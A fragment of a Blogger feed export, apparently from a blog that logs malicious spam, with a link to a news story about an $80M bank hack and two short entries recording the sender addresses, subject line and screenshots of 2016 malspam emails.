<span style="background-color: white; color: #222222; font-family: ElizabethSerif, Georgia, serif; font-size: 16px; line-height: 29px;"><a href="http://gizmodo.com/an-80m-bank-hack-has-been-blamed-on-10-routers-1772442595">Read the full story here</a>. </span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-90305180364710979972016-04-21T05:11:00.001-07:002016-04-21T05:11:18.645-07:00MalSpam: FW: Receipt #119798<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Sender: FarleyClare9749@greenvillehomebuyer.com</span><div>
<span style="font-family: Arial, Helvetica, sans-serif;">Subject: <span style="background-color: white; line-height: 35px; white-space: nowrap;">FW: Receipt #119798</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-isVmHTzXk_I/VxjDT7vJ24I/AAAAAAAAAB0/Bkp1osBwfqMcMAf92jtedgwr1jVNvvjPwCLcB/s1600/Screen%2BShot%2B2016-04-21%2Bat%2B10.09.34%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="165" src="https://2.bp.blogspot.com/-isVmHTzXk_I/VxjDT7vJ24I/AAAAAAAAAB0/Bkp1osBwfqMcMAf92jtedgwr1jVNvvjPwCLcB/s400/Screen%2BShot%2B2016-04-21%2Bat%2B10.09.34%2Bpm.png" width="400" /></a></div>
MalSpam: FW: (2016-04-21)<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Sender: willsonSuzanne420@thriftevaluator.com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-m4SbAKujSQ4/Vxi7RCz7FaI/AAAAAAAAABk/Glf4PW-Dzs8R299IohEjIDk-byve0e56QCLcB/s1600/Screen%2BShot%2B2016-04-21%2Bat%2B9.35.54%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img border="0" height="118" src="https://2.bp.blogspot.com/-m4SbAKujSQ4/Vxi7RCz7FaI/AAAAAAAAABk/Glf4PW-Dzs8R299IohEjIDk-byve0e56QCLcB/s400/Screen%2BShot%2B2016-04-21%2Bat%2B9.35.54%2Bpm.png" width="400" /></span></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>Unknownnoreply@blogger.com0